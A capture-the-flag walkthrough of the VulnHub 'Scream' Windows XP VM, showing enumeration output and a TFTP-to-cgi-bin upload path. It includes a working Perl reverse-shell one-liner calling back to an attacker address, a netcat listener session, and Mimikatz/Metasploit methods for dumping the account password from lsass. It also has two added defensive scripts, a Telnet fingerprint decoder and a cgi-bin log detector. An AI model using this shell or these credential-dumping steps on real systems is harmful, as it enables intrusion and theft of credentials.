VulnHub Scream (Beginner-Medium)
=============================================================================================
Walkthrough of the /dev/random SCREAM VulnHub Windows VM CTF
=============================================================================================
The goal of this CTF is to recover the clear-text password of the current Windows account.
Step 1. Scanning & Enumeration (Nmap + Nikto + Dirb + Searchsploit + manual tests)
+ FTP server (anonymous access, read-only privilege)
+ Freesshd server v.2.1.3 (prone to a known RCE vulnerability)
+ WarFTPd server v.1.65 (prone to a known RCE vulnerability)
+ TinyWeb HTTP server, TFTP server, Telnet
Step 2. Gaining access and Privilege escalation to 'NT AUTHORITY\SYSTEM'
Method 1 (easy/medium)
----------------------
1. Find out that it is possible to upload files into '/www/root/cgi-bin/' via the TFTP server and that the uploaded files can be browsed ("http://192.168.1.11/cgi-bin/<file>")
2. Find out that Perl scripts stored in '/cgi-bin/' are executed (TinyWeb documentation and Internet blog posts)
3. Upload a Perl script (reverse shell) into '/cgi-bin/' and execute it (i.e. "curl http://192.168.1.11/cgi-bin/TinyWebRCE.pl")
4. Obtain a reverse shell running as the account 'alex', which is a member of the local Administrators group
5. Dump the clear-text password of the 'alex' account using one of the multiple methods available:
=> Option 1. Upload the tool Mimikatz via TFTP and then use it to elevate to 'NT AUTHORITY\SYSTEM'
and dump the clear-text password of the 'alex' account from memory (lsass).
=> Option 2. Upload the tools PsExec.exe and ProcDump.exe (Sysinternals) via TFTP and then use these tools to elevate to 'NT AUTHORITY\SYSTEM'
and dump the memory of the lsass process. Finally, use Mimikatz to extract offline the clear-text password of the 'alex' account.
=> Option 3. Disable the firewall (since we are local admin), then use a well known exploit such as ms08067 or ms17010 with metasploit to gain a 'SYSTEM' remote shell on this legacy Windows machine (XP)
and dump the clear-text password with the metasploit's mimikatz module.
=> ...
Method 2 (very easy)
--------------------
1. Exploit the "authentication bypass" vulnerability affecting the Freesshd server v. 2.1.3 using an old exploit available in Metasploit Msf4.
Notes:
- The new version of the exploit available in msf5 has been modified and it doesn't work against this legacy Windows machine (XP).
- I tried several other exploits from ExploitDB and GitHub, but none of them worked (I spent time trying to debug them, though).
2. Obtain a reverse-shell (meterpreter) running with 'NT AUTHORITY\SYSTEM'
3. Dump the clear-text password of the 'alex' account from memory (lsass) with the metasploit's mimikatz module.
=============================================================================================
Step 1. Scanning & Enumeration (Nmap + Nikto + Dirb + Searchsploit)
=============================================================================================
jeff@kali-Linux:~/Documents/CTFs/Scream$ sudo nmap -sS -sV -p- -sC 192.168.1.4
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-03 22:50 CEST
Service scan Timing: About 75.00% done; ETC: 22:52 (0:00:14 remaining)
Nmap scan report for 192.168.1.4
Host is up (0.00077s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp WAR-FTPD 1.65 (Name Scream XP (SP2) FTP Service)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 bin
| drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 log
|_drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 root
|_ftp-bounce: bounce working!
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh WeOnlyDo sshd 2.1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 2c:23:77:67:d3:e0:ae:2a:a8:01:a4:9e:54:97:db:2c (DSA)
|_ 1024 fa:11:a5:3d:63:95:4a:ae:3e:16:49:2f:bb:4b:f1:de (RSA)
23/tcp open telnet
| fingerprint-strings:
| GenericLines, NCP, RPCCheck, tn3270:
| Scream Telnet Service
| login:
| GetRequest:
| HTTP/1.0
| Scream Telnet Service
| login:
| Help:
| HELP
| Scream Telnet Service
| login:
| SIPOptions:
| OPTIONS sip:nm SIP/2.0
| Via: SIP/2.0/TCP nm;branch=foo
| From: <sip:nm@nm>;tag=root
| <sip:nm2@nm2>
| Call-ID: 50000
| CSeq: 42 OPTIONS
| Max-Forwards: 70
| Content-Length: 0
| Contact: <sip:nm@nm>
| Accept: application/sdp
| Scream Telnet Service
|_ login:
80/tcp open http Tinyweb httpd 1.93
|_http-server-header: TinyWeb/1.93
|_http-title: The Scream - Edvard Munch
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.70%I=7%D=4/3%Time=5E87A1F2%P=x86_64-apple-darwin13.4.0%r
SF:(NULL,12,"\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\
SF:xfd\x1f")%r(GenericLines,34,"\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x
SF:03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nScream\x20Telnet\x20Service\r\nlogin:
SF:\x20")%r(tn3270,3C,"\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xf
SF:d\x18\xff\xfd\x1f\xff\xfc\x18\xff\xfe\x19\xff\xfc\x19\xff\xfb\0Scream\x
SF:20Telnet\x20Service\r\nlogin:\x20")%r(GetRequest,42,"\xff\xfb\x01\xff\x
SF:fe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1fGET\x20/\x20HTTP/1\.0
SF:\r\n\r\nScream\x20Telnet\x20Service\r\nlogin:\x20")%r(RPCCheck,5C,"\xff
SF:\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\x80\0\
SF:0\(r\xfe\x1d\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Scream\x20Telnet\x20Service\r\nlogin:\x20"
SF:)%r(Help,36,"\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\x
SF:ff\xfd\x1fHELP\r\nScream\x20Telnet\x20Service\r\nlogin:\x20")%r(SIPOpti
SF:ons,10F,"\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\x
SF:fd\x1fOPTIONS\x20sip:nm\x20SIP/2\.0\r\nVia:\x20SIP/2\.0/TCP\x20nm;branc
SF:h=foo\r\nFrom:\x20<sip:nm@nm>;tag=root\r\nTo:\x20<sip:nm2@nm2>\r\nCall-
SF:ID:\x2050000\r\nCSeq:\x2042\x20OPTIONS\r\nMax-Forwards:\x2070\r\nConten
SF:t-Length:\x200\r\nContact:\x20<sip:nm@nm>\r\nAccept:\x20application/sdp
SF:\r\n\r\nScream\x20Telnet\x20Service\r\nlogin:\x20")%r(NCP,31,"\xff\xfb\
SF:x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\x13Scream\x
SF:20Telnet\x20Service\r\nlogin:\x20");
MAC Address: 08:00:27:BC:49:7E (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
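The SF-Port23-TCP block above is Nmap's escaped dump of what the Telnet service answered to each probe; the leading 0xff bytes are Telnet option negotiation (IAC WILL/DO/DONT ...), not part of the banner. The following script is an added example, not part of the original walkthrough: it re-joins the SF: continuation lines, undoes Nmap's escaping, checks each probe's declared length, and decodes the negotiation so an analyst can read what the server actually asked for (echo on, line mode off, terminal type and window size requested). The fingerprint excerpt is constructed from the page (trimmed to three probes); the option-name table covers only the options that appear here.

```python
import re

# Constructed excerpt of the Nmap fingerprint for TCP/23 from the walkthrough,
# trimmed to the NULL, GenericLines and Help probe responses.
SF_FINGERPRINT = r"""
SF-Port23-TCP:V=7.70%I=7%D=4/3%Time=5E87A1F2%P=x86_64-apple-darwin13.4.0%r
SF:(NULL,12,"\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\
SF:xfd\x1f")%r(GenericLines,34,"\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x
SF:03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nScream\x20Telnet\x20Service\r\nlogin:
SF:\x20")%r(Help,36,"\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\x
SF:ff\xfd\x1fHELP\r\nScream\x20Telnet\x20Service\r\nlogin:\x20");
"""

# %r(ProbeName,HexLength,"escaped bytes")
PROBE_RE = re.compile(r'%r\((\w+),([0-9A-Fa-f]+),"((?:[^"\\]|\\.)*)"\)')

# Telnet command bytes (RFC 854) and the option codes seen in this fingerprint.
IAC = 255
VERBS = {251: 'WILL', 252: 'WONT', 253: 'DO', 254: 'DONT'}
OPTIONS = {0: 'TRANSMIT-BINARY', 1: 'ECHO', 3: 'SUPPRESS-GO-AHEAD',
           24: 'TERMINAL-TYPE', 31: 'NAWS', 34: 'LINEMODE'}

_SHORT = {'0': 0, 'r': 13, 'n': 10, 't': 9}


def join_fingerprint(text):
    """Strip the 'SF:' continuation prefix and glue the wrapped lines back together."""
    parts = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            parts.append(line[3:] if line.startswith('SF:') else line)
    return ''.join(parts)


def unescape_nmap(s):
    """Undo Nmap's escaping: \\xHH, \\0 \\r \\n \\t, and backslash-quoted literals."""
    out, i = bytearray(), 0
    while i < len(s):
        if s[i] != '\\':
            out.append(ord(s[i])); i += 1
        elif s[i + 1] == 'x':
            out.append(int(s[i + 2:i + 4], 16)); i += 4
        elif s[i + 1] in _SHORT:
            out.append(_SHORT[s[i + 1]]); i += 2
        else:  # \" \\ \( \| \. ... -> the literal character
            out.append(ord(s[i + 1])); i += 2
    return bytes(out)


def parse_fingerprint(text):
    """Return {probe_name: raw_response_bytes}, verifying each declared length."""
    probes = {}
    for name, declared, body in PROBE_RE.findall(join_fingerprint(text)):
        data = unescape_nmap(body)
        if len(data) != int(declared, 16):
            raise ValueError(f'{name}: declared {int(declared, 16)} bytes, decoded {len(data)}')
        probes[name] = data
    return probes


def decode_telnet(data):
    """Split a Telnet stream into [(verb, option), ...] and the remaining text."""
    negotiations, text, i = [], bytearray(), 0
    while i < len(data):
        b = data[i]
        if b == IAC and i + 1 < len(data):
            cmd = data[i + 1]
            if cmd in VERBS and i + 2 < len(data):
                opt = data[i + 2]
                negotiations.append((VERBS[cmd], OPTIONS.get(opt, f'OPT{opt}')))
                i += 3
            elif cmd == IAC:          # escaped literal 0xff data byte
                text.append(IAC); i += 2
            else:                     # other two-byte commands (NOP, GA, ...)
                i += 2
        else:
            text.append(b); i += 1
    return negotiations, text.decode('latin-1')


if __name__ == '__main__':
    for name, raw in parse_fingerprint(SF_FINGERPRINT).items():
        negs, banner = decode_telnet(raw)
        print(name, negs, repr(banner))
```

The length check matters when you paste fingerprints from reports: a wrapped line that lost a character will fail it immediately instead of producing a subtly wrong decode.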
=====================
jeff@kali-Linux:~/Documents/CTFs/Scream$ nikto -h 192.168.1.4
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.4
+ Target Hostname: 192.168.1.4
+ Target Port: 80
+ Start Time: 2020-04-04 23:56:05 (GMT2)
---------------------------------------------------------------------------
+ Server: TinyWeb/1.93
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2020-04-04 23:56:07 (GMT2) (2 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
jeff@kali-Linux:~/Documents/CTFs/Scream$ dirbuster http://192.168.1.4
Apr 04, 2020 11:56:40 PM java.util.prefs.FileSystemPreferences$1 run
INFO: Created user preferences directory.
Exception in thread "AWT-EventQueue-0" java.awt.HeadlessException:
No X11 DISPLAY variable was set, but this program performed an operation which requires it.
at java.desktop/java.awt.GraphicsEnvironment.checkHeadless(GraphicsEnvironment.java:208)
at java.desktop/java.awt.Window.<init>(Window.java:548)
at java.desktop/java.awt.Frame.<init>(Frame.java:423)
at java.desktop/java.awt.Frame.<init>(Frame.java:388)
at java.desktop/javax.swing.JFrame.<init>(JFrame.java:180)
at com.sittinglittleduck.DirBuster.gui.StartGUI.<init>(StartGUI.java:57)
at com.sittinglittleduck.DirBuster.Start$2.run(Start.java:357)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(Native Method)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
=====================
jeff@kali-Linux:~/Documents/CTFs/Scream$ telnet 192.168.1.4
Trying 192.168.1.4...
Connected to 192.168.1.4.
Escape character is '^]'.
Scream Telnet Service
login: user
password:
Login incorrect
login: root
password:
Login incorrect
login: user
password:
Login incorrect
Authentication failed!
Connection closed by foreign host.
=====================
jeff@kali-Linux:~/Documents/CTFs/Scream$ searchsploit WarFTP
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Jgaa WarFTPd 1.66 x4s/1.67-3 - 'CWD/MKD' Denial of Service | exploits/windows/dos/19740.c
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Perl) | exploits/windows/remote/3482.pl
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python) | exploits/windows/remote/3474.py
WarFTP 1.65 - 'USER' Remote Buffer Overflow | exploits/windows/remote/3570.c
WarFTP Daemon 1.82 RC 11 - Remote Format String | exploits/windows/dos/20957.pl
WarFTPd 1.82.00-RC11 - Remote Denial of Service | exploits/windows/dos/2735.py
WarFTPd 1.82.00-RC12 - 'LIST' Format String Denial of Service | exploits/windows/dos/9622.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
jeff@kali-Linux:~/Documents/CTFs/Scream$ searchsploit -x 3474
Exploit: WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python)
URL: https://www.exploit-db.com/exploits/3474
Path: /usr/share/exploitdb/exploits/windows/remote/3474.py
File Type: Python script, ASCII text executable, with CRLF line terminators
jeff@kali-Linux:~/Documents/CTFs/Scream$ msfconsole
=[ metasploit v5.0.70-dev ]
+ -- --=[ 1960 exploits - 1094 auxiliary - 336 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > search warftp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/ftp/warftpd_165_pass 1998-03-19 average No War-FTPD 1.65 Password Overflow
1 exploit/windows/ftp/warftpd_165_user 1998-03-19 average No War-FTPD 1.65 Username Overflow
=====================
freeSSHd 2.1.3 - Remote Authentication Bypass
jeff@kali-Linux:~/Documents/CTFs/Scream$ searchsploit freeSSHd
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path | exploits/windows/local/48044.txt
freeSSHd - Denial of Service (PoC) | exploits/windows/dos/18268.txt
freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow | exploits/windows/remote/1787.py
freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit) | exploits/windows/remote/16461.rb
freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Remote Denial of Service | exploits/linux/dos/31218.txt
freeSSHd 1.2.1 - 'rename' Remote Buffer Overflow (SEH) | exploits/windows/remote/8295.pl
freeSSHd 1.2.1 - (Authenticated) Remote Overflow (SEH) | exploits/windows/remote/5751.pl
freeSSHd 1.2.1 - (Authenticated) Remote Stack Overflow (PoC) | exploits/windows/dos/5709.pl
freeSSHd 1.2.1 - (Authenticated) SFTP 'realpath' Remote Buffer Overflow (PoC) | exploits/windows/dos/6812.pl
freeSSHd 1.2.1 - (Authenticated) SFTP 'rename' Remote Buffer Overflow (PoC) | exploits/windows/dos/6800.pl
freeSSHd 1.2.4 - Denial of Service | exploits/windows/dos/11842.py
freeSSHd 1.2.6 - Authentication Bypass (Metasploit) | exploits/windows/remote/24133.rb
freeSSHd 1.3.1 - Denial of Service | exploits/windows/dos/38001.py
freeSSHd 2.1.3 - Remote Authentication Bypass | exploits/windows/remote/23080.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
jeff@kali-Linux:~/Documents/CTFs/Scream$ searchsploit -x 23080
Exploit: freeSSHd 2.1.3 - Remote Authentication Bypass
URL: https://www.exploit-db.com/exploits/23080
Path: /usr/share/exploitdb/exploits/windows/remote/23080.txt
File Type: ASCII text, with CRLF line terminators
=====================
jeff@kali-Linux:~/Documents/CTFs/Scream$ ftp 192.168.1.4
Connected to 192.168.1.4.
220- Scream XP (SP2) FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
Name (192.168.1.4:jeff): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
ftp> cd /
250 CWD successful. "/" is current directory.
ftp> dir
200 Port command successful
150 Opening data channel for directory list.
drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 bin
drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 log
drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 root
ftp> cd root
250 CWD successful. "/root" is current directory.
ftp> dir
200 Port command successful
150 Opening data channel for directory list.
drwxr-xr-x 1 ftp ftp 0 Feb 08 2013 cgi-bin
---------- 1 ftp ftp 14539 Oct 31 2012 index.html
226 Transfer OK
ftp> put cmdasp.asp
local: cmdasp.asp remote: cmdasp.asp
200 Port command successful
550 Permission denied
ftp> cd cgi-bin
250 CWD successful. "/root/cgi-bin" is current directory.
ftp> dir
200 Port command successful
150 Opening data channel for directory list.
226 Transfer OK
ftp> put cmdasp.asp
local: cmdasp.asp remote: cmdasp.asp
200 Port command successful
550 Permission denied
226 Transfer OK
ftp>
ftp> cd log
250 CWD successful. "/log" is current directory.
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
---------- 1 ftp ftp 23450 Apr 04 23:57 access_log
---------- 1 ftp ftp 12607 Apr 04 23:57 agent_log
---------- 1 ftp ftp 0 Apr 03 22:37 error_log
---------- 1 ftp ftp 674 Nov 01 2012 OpenTFTPServerMT.log
---------- 1 ftp ftp 249 Apr 04 23:57 referer_log
226 Transfer OK
ftp> get access_log
local: access_log remote: access_log
200 Port command successful
550 Permission denied
ftp> get agent_log
local: agent_log remote: agent_log
200 Port command successful
550 Permission denied
ftp> get error_log
local: error_log remote: error_log
200 Port command successful
550 Permission denied
ftp> get OpenTFTPServerMT.log
local: OpenTFTPServerMT.log remote: OpenTFTPServerMT.log
200 Port command successful
550 Permission denied
ftp> get referer_log
local: referer_log remote: referer_log
200 Port command successful
550 Permission denied
=====================
=> Since there is a file named "OpenTFTPServerMT.log", I checked whether the TFTP port is open (UDP/69)...
jeff@kali-Linux:~/Documents/CTFs/Scream$ sudo nmap -sV -sU -p 69 192.168.1.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 01:15 CEST
Nmap scan report for 192.168.1.4
Host is up (0.017s latency).
PORT STATE SERVICE VERSION
69/udp open tftp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port69-UDP:V=7.80%I=7%D=4/5%Time=5E891502%P=x86_64-pc-linux-gnu%r(DNSSt
SF:atusRequest,18,"\0\x05\0\x05Unknown\x20Transfer\x20Id\0");
MAC Address: F4:5C:89:C9:BE:C5 (Apple)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.06 seconds
=============================================================================================
Step 2. Gaining access and privilege escalation to 'NT AUTHORITY\SYSTEM'
=============================================================================================
----------------------------------------- Method 1 ------------------------------------------
=> I logged into the TFTP server and uploaded a webshell and a reverse shell.
jeff@kali-Linux:~/Documents/CTFs/Scream$ tftp 192.168.1.4
tftp> ?
Commands may be abbreviated. Commands are:
connect connect to remote tftp
mode set file transfer mode
put send file
get receive file
quit exit tftp
verbose toggle verbose mode
trace toggle packet tracing
status show current status
binary set mode to octet
ascii set mode to netascii
rexmt set per-packet retransmission timeout
timeout set total retransmission timeout
? print help information
tftp> put cmdasp.asp
Sent 1581 bytes in 0.0 seconds
tftp> binary
tftp> put shell.exe
Sent 73802 bytes in 0.6 seconds
tftp> quit
=> Then I tried to browse the website to find my files, but it did not work, so I checked the FTP server...
jeff@kali-Linux:~/Documents/CTFs/Scream$ ftp 192.168.1.4
Connected to 192.168.1.4.
220- Scream XP (SP2) FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
Name (192.168.1.4:jeff): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 bin
drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 log
drwxr-xr-x 1 ftp ftp 0 Apr 05 00:35 root
226 Transfer OK
ftp> cd root
250 CWD successful. "/root" is current directory.
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
drwxr-xr-x 1 ftp ftp 0 Feb 08 2013 cgi-bin
---------- 1 ftp ftp 1636 Apr 05 00:35 cmdasp.asp
---------- 1 ftp ftp 14539 Oct 31 2012 index.html
---x--x--x 1 ftp ftp 73802 Apr 05 00:46 shell.exe
=> I re-uploaded my files using the TFTP server, but this time I uploaded them into the folder "/cgi-bin/".
jeff@kali-Linux:~/Documents/CTFs/Scream$ tftp 192.168.1.4
tftp> ?
Commands may be abbreviated. Commands are:
connect connect to remote tftp
mode set file transfer mode
put send file
get receive file
quit exit tftp
verbose toggle verbose mode
trace toggle packet tracing
status show current status
binary set mode to octet
ascii set mode to netascii
rexmt set per-packet retransmission timeout
timeout set total retransmission timeout
? print help information
tftp> binary
tftp> put shell.exe
Sent 73802 bytes in 0.6 seconds
tftp> put /cgi-bin/shell.exe
Sent 73802 bytes in 0.5 seconds
tftp> put /cgi-bin/Test.txt
Sent 5 bytes in 0.0 seconds
tftp> put /cgi-bin/cmdasp.asp
Sent 1526 bytes in 0.0 seconds
tftp> quit
=> The ASP webshell and the meterpreter shell.exe still did not work ('Access is denied').
jeff@kali-Linux:~/Documents/CTFs/Scream$ curl http://192.168.1.4/cgi-bin/shell.exe
[*] exec: curl http://192.168.1.4/cgi-bin/shell.exe
<HTML><TITLE>500 Internal Server Error</TITLE><BODY><H1>Internal Server Error: Access is denied</H1></BODY></HTML>
jeff@kali-Linux:~/Documents/CTFs/Scream$ curl http://192.168.1.4/cgi-bin/cmdasp.asp?cmd=dir
[*] exec: curl http://192.168.1.4/cgi-bin/cmdasp.asp?cmd=dir
<HTML><TITLE>500 Internal Server Error</TITLE><BODY><H1>Internal Server Error: Access is denied</H1></BODY></HTML>
jeff@kali-Linux:~/Documents/CTFs/Scream$ curl http://192.168.1.4/cgi-bin/test.txt
[*] exec: curl http://192.168.1.4/cgi-bin/test.txt
<HTML><TITLE>500 Internal Server Error</TITLE><BODY><H1>Internal Server Error: NOTEPAD.EXE is a GUI application</H1></BODY></HTML>
=> I found and followed a tutorial on the Internet that explains how to execute a Perl script uploaded into the folder '/cgi-bin/' of a TinyWeb server.
My Perl script (reverse shell) looks like this:
jeff@kali-Linux:~/Documents/CTFs/Scream$ cat TinyWebRCE.pl
## CGI Testing Example
$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.1.34:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
jeff@kali-Linux:~/Documents/CTFs/Scream$ tftp 192.168.1.4
tftp> put /cgi-bin/TinyWebRCE.pl
Sent 220 bytes in 0.1 seconds
tftp> quit
jeff@kali-Linux:~/Documents/CTFs/Scream$ curl http://192.168.1.4/cgi-bin/TinyWebRCE2.pl
<HTML><TITLE>500 Internal Server Error</TITLE><BODY><H1>Internal Server Error: Can't locate object method "new" via package "IO::Socket::INET" (perhaps you forgot to load "IO::Socket::INET"?) at c:\www\root\cgi-bin\TinyWebRCE2.pl line 2.
=> I modified my payload (several times) to finally make it work...
jeff@kali-Linux:~/Documents/CTFs/Scream$ cat TinyWebRCE4.pl
## CGI Testing Example
use IO::Socket::INET;$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.1.34:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
jeff@kali-Linux:~/Documents/CTFs/Scream$ tftp 192.168.1.4
tftp> put /cgi-bin/TinyWebRCE4.pl
Sent 131 bytes in 0.3 seconds
tftp>
jeff@kali-Linux:~/Documents/CTFs/Scream$ curl http://192.168.1.4/cgi-bin/TinyWebRCE4.pl
curl: (52) Empty reply from server
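The chain above is an unauthenticated TFTP write into the web root followed by an HTTP request that makes TinyWeb execute the new file. From the defender's side the same chain leaves two artifacts: files in cgi-bin that are not in the deployed baseline, and access_log entries requesting them (including the 500 "Access is denied" responses from the earlier failed attempts). The script below is an added example, not part of the original walkthrough: it diffs a `dir` listing of cgi-bin against an expected-file baseline and scans access-log lines for requests to cgi-bin files outside that baseline or answered with a 5xx status. The listing and log lines are constructed in the shape of the output shown on this page; TinyWeb's access_log is assumed to be NCSA common log format, and the empty baseline assumes cgi-bin ships no scripts, as the earlier FTP listing suggested.

```python
import re

# Constructed: files the administrator expects in cgi-bin (none on this box,
# per the empty FTP listing earlier in the walkthrough; assumption).
BASELINE_CGI = set()

# Constructed listing in the shape of the `dir` output in the walkthrough.
DIR_LISTING = """\
04/05/2020  04:23 AM    <DIR>          .
04/05/2020  04:23 AM    <DIR>          ..
04/05/2020  01:52 AM             1,526 cmdasp.asp
04/05/2020  01:51 AM            73,802 shell.exe
04/05/2020  04:12 AM               133 TinyWebRCE4.pl
"""

# Constructed access_log lines (NCSA common log format is an assumption).
ACCESS_LOG = """\
192.168.1.34 - - [05/Apr/2020:03:55:10 +0200] "GET /cgi-bin/shell.exe HTTP/1.1" 500 118
192.168.1.34 - - [05/Apr/2020:03:55:31 +0200] "GET /cgi-bin/cmdasp.asp?cmd=dir HTTP/1.1" 500 118
192.168.1.34 - - [05/Apr/2020:04:12:45 +0200] "GET /cgi-bin/TinyWebRCE4.pl HTTP/1.1" 200 0
192.168.1.20 - - [05/Apr/2020:04:13:02 +0200] "GET /index.html HTTP/1.1" 200 14539
"""

DIR_RE = re.compile(r'^(\d{2}/\d{2}/\d{4})\s+(\d{2}:\d{2} [AP]M)\s+(<DIR>|[\d,]+)\s+(.+?)\s*$')
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def parse_dir_listing(text):
    """Return {filename: size} from Windows `dir` output, skipping directories."""
    files = {}
    for line in text.splitlines():
        m = DIR_RE.match(line)
        if m and m.group(3) != '<DIR>':
            files[m.group(4)] = int(m.group(3).replace(',', ''))
    return files


def unexpected_cgi_files(listing, baseline):
    """Files present in cgi-bin that are not in the baseline (case-insensitive: NTFS)."""
    known = {b.lower() for b in baseline}
    return sorted((n for n in listing if n.lower() not in known), key=str.lower)


def scan_access_log(text, baseline):
    """Flag cgi-bin requests for non-baseline files or that ended in a 5xx."""
    known = {b.lower() for b in baseline}
    alerts = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        client, ts, method, target, status, _size = m.groups()
        path = target.split('?', 1)[0]          # drop the query string (cmd=dir)
        if not path.lower().startswith('/cgi-bin/'):
            continue
        name = path.rsplit('/', 1)[1]
        reasons = []
        if name.lower() not in known:
            reasons.append('not in cgi-bin baseline')
        if status.startswith('5'):
            reasons.append(f'server error {status}')
        if reasons:
            alerts.append((client, ts, name, '; '.join(reasons)))
    return alerts


if __name__ == '__main__':
    print('unexpected files:', unexpected_cgi_files(parse_dir_listing(DIR_LISTING), BASELINE_CGI))
    for alert in scan_access_log(ACCESS_LOG, BASELINE_CGI):
        print('ALERT', *alert)
```

Both checks are cheap enough to run from a scheduled task on the host; the real fix is still to stop the TFTP service from writing anywhere under the web root, since any baseline check only detects the write after the fact.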
=> I got a reverse shell :-)
jeff@kali-Linux:~$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.1.34] from (UNKNOWN) [192.168.1.4] 1043
dir
Volume in drive C has no label.
Volume Serial Number is 8080-53D6
Directory of c:\www\root\cgi-bin
04/05/2020 04:23 AM <DIR> .
04/05/2020 04:23 AM <DIR> ..
04/05/2020 01:52 AM 1,526 cmdasp.asp
04/05/2020 01:51 AM 73,802 shell.exe
